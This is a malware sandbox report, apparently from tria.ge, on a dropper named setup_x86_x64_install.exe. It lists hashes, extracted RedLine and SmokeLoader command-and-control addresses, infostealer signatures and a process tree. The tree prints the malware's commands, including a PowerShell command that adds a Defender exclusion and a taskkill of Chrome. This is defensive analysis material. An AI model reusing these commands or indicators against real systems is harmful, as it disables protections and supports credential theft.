Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
11/10/2021, 20:45
211011-zjxjlsabbm 1011/10/2021, 13:10
211011-qegsxshcfp 1011/10/2021, 10:55
211011-mz7y3ahaak 1010/10/2021, 19:24
211010-x4mtssgae2 10Analysis
-
max time kernel
1806s -
max time network
1819s -
platform
windows7_x64 -
resource
win7-ja-20210920 -
submitted
11/10/2021, 10:55
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
3.9MB
-
MD5
a4d23ac3c7172b9aa02e35b6bf0fd21f
-
SHA1
0326aab7deddfefc048c9a67ac9ce4ee14ea9003
-
SHA256
9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806
-
SHA512
9e425d8a1beaeabfc983bb75a7a5f8a8c0823e825e9f66e17b0f515b2897da9f2d9b2f1aa9939fdbae6c826c2c730d3bc772abec9e35a61d3d73a6cdb87ddf10
Malware Config
Extracted
redline
she
135.181.129.119:4805
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Extracted
redline
ANI
45.142.215.47:27643
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
resource yara_rule behavioral1/memory/2024-199-0x00000000003B0000-0x00000000003CF000-memory.dmp family_redline behavioral1/memory/2024-207-0x00000000019F0000-0x0000000001A0D000-memory.dmp family_redline behavioral1/memory/2184-246-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2184-243-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2184-248-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2184-251-0x000000000041B23A-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral1/files/0x00050000000131ea-102.dat family_socelars behavioral1/files/0x00050000000131ea-163.dat family_socelars behavioral1/files/0x00050000000131ea-135.dat family_socelars -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
resource yara_rule behavioral1/files/0x000500000001267c-70.dat aspack_v212_v242 behavioral1/files/0x000500000001267c-71.dat aspack_v212_v242 behavioral1/files/0x0006000000012634-72.dat aspack_v212_v242 behavioral1/files/0x0006000000012634-73.dat aspack_v212_v242 behavioral1/files/0x00050000000126a2-76.dat aspack_v212_v242 behavioral1/files/0x00050000000126a2-77.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 25 IoCs
pid Process 1184 setup_installer.exe 1060 setup_install.exe 700 Sun152bab5a2de.exe 320 Sun1577c3e159a3e3815.exe 1884 Sun159ff1acacf.exe 1160 Sun1507db358fce61c0b.exe 824 Sun15dbd675f871ca.exe 1776 Sun15901f2f025e.exe 1148 Sun15f67075f27a2b5b.exe 2024 Sun15f1b1f8c669.exe 1328 Sun152bea652bd7232.exe 1348 Sun158d8ef840.exe 1560 Sun152e52d07b74d9b5.exe 2424 09xU.exE 2484 w1CFQ6ffZ6sxCNcHQMfq73m0.exe 2936 7169928.scr 3012 3575431.scr 2184 Sun159ff1acacf.exe 764 WinHoster.exe 2928 6430286.scr 2132 2730126.scr 2392 E521.exe 1124 eevtgij 2588 eevtgij 2428 eevtgij -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6430286.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6430286.scr -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation Sun15dbd675f871ca.exe -
Loads dropped DLL 64 IoCs
pid Process 1148 setup_x86_x64_install.exe 1184 setup_installer.exe 1184 setup_installer.exe 1184 setup_installer.exe 1184 setup_installer.exe 1184 setup_installer.exe 1184 setup_installer.exe 1060 setup_install.exe 1060 setup_install.exe 1060 setup_install.exe 1060 setup_install.exe 1060 setup_install.exe 1060 setup_install.exe 1060 setup_install.exe 1060 setup_install.exe 2028 cmd.exe 1984 cmd.exe 1984 cmd.exe 1488 cmd.exe 620 cmd.exe 556 cmd.exe 588 cmd.exe 588 cmd.exe 960 cmd.exe 960 cmd.exe 1640 cmd.exe 1640 cmd.exe 320 Sun1577c3e159a3e3815.exe 320 Sun1577c3e159a3e3815.exe 700 Sun152bab5a2de.exe 700 Sun152bab5a2de.exe 432 cmd.exe 1884 Sun159ff1acacf.exe 1884 Sun159ff1acacf.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 1160 Sun1507db358fce61c0b.exe 1160 Sun1507db358fce61c0b.exe 2024 Sun15f1b1f8c669.exe 2024 Sun15f1b1f8c669.exe 1612 cmd.exe 1492 cmd.exe 1348 Sun158d8ef840.exe 1348 Sun158d8ef840.exe 1776 Sun15901f2f025e.exe 1776 Sun15901f2f025e.exe 1884 Sun159ff1acacf.exe 2348 cmd.exe 2424 09xU.exE 2424 09xU.exE 824 Sun15dbd675f871ca.exe 2184 Sun159ff1acacf.exe 2184 Sun159ff1acacf.exe 3068 rundll32.exe 3068 rundll32.exe 3068 rundll32.exe 3012 3575431.scr 764 WinHoster.exe 764 WinHoster.exe 2656 WerFault.exe 2656 WerFault.exe 2656 WerFault.exe 2656 WerFault.exe 2656 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 3575431.scr -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6430286.scr -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com 35 ipinfo.io 36 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2928 6430286.scr -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1884 set thread context of 2184 1884 Sun159ff1acacf.exe 59 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 2656 824 WerFault.exe 56 1804 1560 WerFault.exe 45 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI eevtgij Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI eevtgij Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI eevtgij Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cmd.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI eevtgij Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI eevtgij Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI eevtgij Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cmd.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI eevtgij Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI eevtgij Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI eevtgij -
Kills process with taskkill 3 IoCs
pid Process 2440 taskkill.exe 2600 taskkill.exe 1812 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Sun15901f2f025e.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Sun15901f2f025e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun15f67075f27a2b5b.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun15f67075f27a2b5b.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1160 cmd.exe 1160 cmd.exe 1300 powershell.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 824 Sun15dbd675f871ca.exe 1364 Process not Found 1364 Process not Found 1364 Process not Found 2484 w1CFQ6ffZ6sxCNcHQMfq73m0.exe 2484 w1CFQ6ffZ6sxCNcHQMfq73m0.exe 2484 w1CFQ6ffZ6sxCNcHQMfq73m0.exe 1364 Process not Found 2484 w1CFQ6ffZ6sxCNcHQMfq73m0.exe 1364 Process not Found 2484 w1CFQ6ffZ6sxCNcHQMfq73m0.exe 1364 Process not Found 2484 w1CFQ6ffZ6sxCNcHQMfq73m0.exe 1364 Process not Found 2484 w1CFQ6ffZ6sxCNcHQMfq73m0.exe 1364 Process not Found 2484 w1CFQ6ffZ6sxCNcHQMfq73m0.exe 2484 w1CFQ6ffZ6sxCNcHQMfq73m0.exe 1364 Process not Found 2484 w1CFQ6ffZ6sxCNcHQMfq73m0.exe 1364 Process not Found 2484 w1CFQ6ffZ6sxCNcHQMfq73m0.exe 1364 Process not Found 2484 w1CFQ6ffZ6sxCNcHQMfq73m0.exe 1364 Process not Found 2484 w1CFQ6ffZ6sxCNcHQMfq73m0.exe 1364 Process not Found 2484 w1CFQ6ffZ6sxCNcHQMfq73m0.exe 1364 Process not Found 2484 w1CFQ6ffZ6sxCNcHQMfq73m0.exe 1364 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 1364 Process not Found 2656 WerFault.exe 1804 WerFault.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1160 cmd.exe 1124 eevtgij 2588 eevtgij 2428 eevtgij -
Suspicious use of AdjustPrivilegeToken 61 IoCs
description pid Process Token: SeCreateTokenPrivilege 1776 Sun15901f2f025e.exe Token: SeAssignPrimaryTokenPrivilege 1776 Sun15901f2f025e.exe Token: SeLockMemoryPrivilege 1776 Sun15901f2f025e.exe Token: SeIncreaseQuotaPrivilege 1776 Sun15901f2f025e.exe Token: SeMachineAccountPrivilege 1776 Sun15901f2f025e.exe Token: SeTcbPrivilege 1776 Sun15901f2f025e.exe Token: SeSecurityPrivilege 1776 Sun15901f2f025e.exe Token: SeTakeOwnershipPrivilege 1776 Sun15901f2f025e.exe Token: SeLoadDriverPrivilege 1776 Sun15901f2f025e.exe Token: SeSystemProfilePrivilege 1776 Sun15901f2f025e.exe Token: SeSystemtimePrivilege 1776 Sun15901f2f025e.exe Token: SeProfSingleProcessPrivilege 1776 Sun15901f2f025e.exe Token: SeIncBasePriorityPrivilege 1776 Sun15901f2f025e.exe Token: SeCreatePagefilePrivilege 1776 Sun15901f2f025e.exe Token: SeCreatePermanentPrivilege 1776 Sun15901f2f025e.exe Token: SeBackupPrivilege 1776 Sun15901f2f025e.exe Token: SeRestorePrivilege 1776 Sun15901f2f025e.exe Token: SeShutdownPrivilege 1776 Sun15901f2f025e.exe Token: SeDebugPrivilege 1776 Sun15901f2f025e.exe Token: SeAuditPrivilege 1776 Sun15901f2f025e.exe Token: SeSystemEnvironmentPrivilege 1776 Sun15901f2f025e.exe Token: SeChangeNotifyPrivilege 1776 Sun15901f2f025e.exe Token: SeRemoteShutdownPrivilege 1776 Sun15901f2f025e.exe Token: SeUndockPrivilege 1776 Sun15901f2f025e.exe Token: SeSyncAgentPrivilege 1776 Sun15901f2f025e.exe Token: SeEnableDelegationPrivilege 1776 Sun15901f2f025e.exe Token: SeManageVolumePrivilege 1776 Sun15901f2f025e.exe Token: SeImpersonatePrivilege 1776 Sun15901f2f025e.exe Token: SeCreateGlobalPrivilege 1776 Sun15901f2f025e.exe Token: 31 1776 Sun15901f2f025e.exe Token: 32 1776 Sun15901f2f025e.exe Token: 33 1776 Sun15901f2f025e.exe Token: 34 1776 Sun15901f2f025e.exe Token: 35 1776 Sun15901f2f025e.exe Token: SeDebugPrivilege 1300 powershell.exe Token: SeDebugPrivilege 1560 Sun152e52d07b74d9b5.exe Token: SeDebugPrivilege 1148 Sun15f67075f27a2b5b.exe Token: SeDebugPrivilege 2600 taskkill.exe Token: SeDebugPrivilege 2440 taskkill.exe Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeDebugPrivilege 2936 7169928.scr Token: SeDebugPrivilege 2024 Sun15f1b1f8c669.exe Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeDebugPrivilege 1812 taskkill.exe Token: SeDebugPrivilege 2184 Sun159ff1acacf.exe Token: SeDebugPrivilege 2656 WerFault.exe Token: SeDebugPrivilege 1804 WerFault.exe Token: SeShutdownPrivilege 1364 Process not Found Token: SeDebugPrivilege 2132 2730126.scr Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeDebugPrivilege 2392 E521.exe Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1148 wrote to memory of 1184 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1184 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1184 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1184 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1184 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1184 1148 setup_x86_x64_install.exe 28 PID 1148 wrote to memory of 1184 1148 setup_x86_x64_install.exe 28 PID 1184 wrote to memory of 1060 1184 setup_installer.exe 29 PID 1184 wrote to memory of 1060 1184 setup_installer.exe 29 PID 1184 wrote to memory of 1060 1184 setup_installer.exe 29 PID 1184 wrote to memory of 1060 1184 setup_installer.exe 29 PID 1184 wrote to memory of 1060 1184 setup_installer.exe 29 PID 1184 wrote to memory of 1060 1184 setup_installer.exe 29 PID 1184 wrote to memory of 1060 1184 setup_installer.exe 29 PID 1060 wrote to memory of 1592 1060 setup_install.exe 33 PID 1060 wrote to memory of 1592 1060 setup_install.exe 33 PID 1060 wrote to memory of 1592 1060 setup_install.exe 33 PID 1060 wrote to memory of 1592 1060 setup_install.exe 33 PID 1060 wrote to memory of 1592 1060 setup_install.exe 33 PID 1060 wrote to memory of 1592 1060 setup_install.exe 33 PID 1060 wrote to memory of 1592 1060 setup_install.exe 33 PID 1060 wrote to memory of 2028 1060 setup_install.exe 34 PID 1060 wrote to memory of 2028 1060 setup_install.exe 34 PID 1060 wrote to memory of 2028 1060 setup_install.exe 34 PID 1060 wrote to memory of 2028 1060 setup_install.exe 34 PID 1060 wrote to memory of 2028 1060 setup_install.exe 34 PID 1060 wrote to memory of 2028 1060 setup_install.exe 34 PID 1060 wrote to memory of 2028 1060 setup_install.exe 34 PID 1060 wrote to memory of 620 1060 setup_install.exe 35 PID 1060 wrote to memory of 620 1060 setup_install.exe 35 PID 1060 wrote to memory of 620 1060 setup_install.exe 35 PID 1060 wrote to memory of 620 1060 setup_install.exe 35 PID 1060 wrote to memory of 620 1060 setup_install.exe 35 PID 1060 wrote to memory of 620 1060 setup_install.exe 35 PID 1060 wrote to memory of 620 1060 setup_install.exe 35 PID 1060 wrote to memory of 1488 1060 setup_install.exe 36 PID 1060 wrote to memory of 1488 1060 setup_install.exe 36 PID 1060 wrote to memory of 1488 1060 setup_install.exe 36 PID 1060 wrote to memory of 1488 1060 setup_install.exe 36 PID 1060 wrote to memory of 1488 1060 setup_install.exe 36 PID 1060 wrote to memory of 1488 1060 setup_install.exe 36 PID 1060 wrote to memory of 1488 1060 setup_install.exe 36 PID 1060 wrote to memory of 556 1060 setup_install.exe 37 PID 1060 wrote to memory of 556 1060 setup_install.exe 37 PID 1060 wrote to memory of 556 1060 setup_install.exe 37 PID 1060 wrote to memory of 556 1060 setup_install.exe 37 PID 1060 wrote to memory of 556 1060 setup_install.exe 37 PID 1060 wrote to memory of 556 1060 setup_install.exe 37 PID 1060 wrote to memory of 556 1060 setup_install.exe 37 PID 1060 wrote to memory of 1984 1060 setup_install.exe 38 PID 1060 wrote to memory of 1984 1060 setup_install.exe 38 PID 1060 wrote to memory of 1984 1060 setup_install.exe 38 PID 1060 wrote to memory of 1984 1060 setup_install.exe 38 PID 1060 wrote to memory of 1984 1060 setup_install.exe 38 PID 1060 wrote to memory of 1984 1060 setup_install.exe 38 PID 1060 wrote to memory of 1984 1060 setup_install.exe 38 PID 1060 wrote to memory of 960 1060 setup_install.exe 39 PID 1060 wrote to memory of 960 1060 setup_install.exe 39 PID 1060 wrote to memory of 960 1060 setup_install.exe 39 PID 1060 wrote to memory of 960 1060 setup_install.exe 39 PID 1060 wrote to memory of 960 1060 setup_install.exe 39 PID 1060 wrote to memory of 960 1060 setup_install.exe 39 PID 1060 wrote to memory of 960 1060 setup_install.exe 39 PID 1060 wrote to memory of 588 1060 setup_install.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Users\Admin\AppData\Local\Temp\7zS0A482296\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0A482296\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1592
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152bab5a2de.exe4⤵
- Loads dropped DLL
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun152bab5a2de.exeSun152bab5a2de.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15901f2f025e.exe4⤵
- Loads dropped DLL
PID:620 -
C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun15901f2f025e.exeSun15901f2f025e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1776 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1160 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15dbd675f871ca.exe4⤵
- Loads dropped DLL
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun15dbd675f871ca.exeSun15dbd675f871ca.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:824 -
C:\Users\Admin\Pictures\Adobe Films\w1CFQ6ffZ6sxCNcHQMfq73m0.exe"C:\Users\Admin\Pictures\Adobe Films\w1CFQ6ffZ6sxCNcHQMfq73m0.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 824 -s 6526⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15f67075f27a2b5b.exe4⤵
- Loads dropped DLL
PID:556 -
C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun15f67075f27a2b5b.exeSun15f67075f27a2b5b.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1148 -
C:\Users\Admin\AppData\Roaming\7169928.scr"C:\Users\Admin\AppData\Roaming\7169928.scr" /S6⤵
- Executes dropped EXE
